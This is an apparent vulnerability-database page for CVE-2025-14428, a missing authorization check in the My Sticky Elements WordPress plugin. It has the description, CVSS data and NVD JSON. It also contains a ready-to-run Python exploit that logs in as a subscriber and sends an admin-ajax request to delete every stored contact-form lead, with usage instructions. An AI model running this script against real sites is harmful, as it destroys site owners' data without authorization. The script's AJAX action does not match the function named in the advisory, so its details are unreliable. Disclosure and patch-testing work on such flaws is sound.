Security Vulnerability Report
中文
CVE-2025-14428 CVSS 4.3 MEDIUM

CVE-2025-14428

Published: 2026-01-01 17:15:42
Last Modified: 2026-04-15 00:35:42

Description

The All-in-one Sticky Floating Contact Form, Call, Click to Chat, and 50+ Social Icon Tabs - My Sticky Elements plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the 'my_sticky_elements_bulks' function in all versions up to, and including, 2.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all contact form leads stored by the plugin.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

My Sticky Elements WordPress Plugin <= 2.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14428 PoC - WordPress My Sticky Elements Unauthorized Data Deletion # Authenticated attackers with Subscriber role can delete all contact form leads import requests import sys def exploit_cve_2025_14428(target_url, username, password): """ Exploit for CVE-2025-14428: Missing authorization in My Sticky Elements plugin Allows authenticated users (Subscriber+) to delete all contact form leads """ session = requests.Session() # Step 1: Login to WordPress as subscriber login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful as subscriber") # Step 2: Exploit the missing capability check to delete all leads # The vulnerable function my_sticky_elements_bulks doesn't check user capabilities exploit_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'my_sticky_elements_bulk_delete', 'ids': 'all' # Delete all leads } resp = session.post(exploit_url, data=exploit_data) if resp.status_code == 200: print("[+] Exploit sent - all contact form leads may be deleted") print(f"[*] Response: {resp.text}") return True else: print(f"[-] Exploit failed with status: {resp.status_code}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print("Example: python exploit.py https://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_14428(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14428", "sourceIdentifier": "[email protected]", "published": "2026-01-01T17:15:41.813", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The All-in-one Sticky Floating Contact Form, Call, Click to Chat, and 50+ Social Icon Tabs - My Sticky Elements plugin for WordPress is vulnerable to unauthorized data loss due to a missing capability check on the 'my_sticky_elements_bulks' function in all versions up to, and including, 2.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all contact form leads stored by the plugin."}, {"lang": "es", "value": "El plugin All-in-one Sticky Floating Contact Form, Call, Click to Chat, and 50+ Social Icon Tabs - My Sticky Elements para WordPress es vulnerable a la pérdida de datos no autorizada debido a una comprobación de capacidad faltante en la función 'my_sticky_elements_bulks' en todas las versiones hasta, e incluyendo, la 2.3.3. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, eliminen todos los leads de formularios de contacto almacenados por el plugin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/mystickyelements/trunk/mystickyelements-admin.php#L1788", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/mystickyelements/trunk/mystickyelements-admin.php#L29", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/mystickyelements/trunk/mystickyelements-front.php#L121", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3423407/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1b82ce74-11ac-4719-961d-a16717ce023b?source=cve", "source": "[email protected]"}]}}